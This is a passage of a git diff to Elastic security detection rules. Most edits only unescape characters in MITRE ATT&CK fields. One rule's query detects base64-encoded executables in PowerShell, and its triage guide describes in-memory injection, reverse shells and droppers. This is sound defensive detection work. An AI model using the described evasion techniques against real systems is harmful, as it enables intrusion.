--- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json
index 0650e445853..93074c8b406 100644
--- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_105.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json
index 41d2abd769e..4c9a9a974e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_106.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json
index a84a96de617..c5aa17eb5fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json
index 89029cb29e6..89cad0b13e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json
index bb5fa9da0e7..b86c01e4cdd 100644
--- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json
index 50106ac9afa..1a3beaab216 100644
--- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_105.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json
index f0eebc7dd4b..4896ae7b497 100644
--- a/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/acf738b5-b5b2-4acc-bad9-1e18ee234f40_106.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json
index fefe639a3af..b70df15b0f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_104.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json
index 40dc7338a3d..5253b887902 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_105.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json
index bf47b5a249c..3fda998c367 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad0d2742-9a49-11ec-8d6b-acde48001122_106.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json
index 9fe6dd74083..7d6b3355859 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_203.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json
index a5483aea451..ac990e3778b 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_204.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json
index ead1aa1021e..73472a68924 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad3f2807-2b3e-47d7-b282-f84acbbe14be_205.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json
index 5d1daf55eb9..34385726627 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_105.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services 
for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n",
 "references": [
 "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md"
@@ -47,7 +47,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json
index ce493975d00..efbf53ab51c 100644
--- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = 
authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add 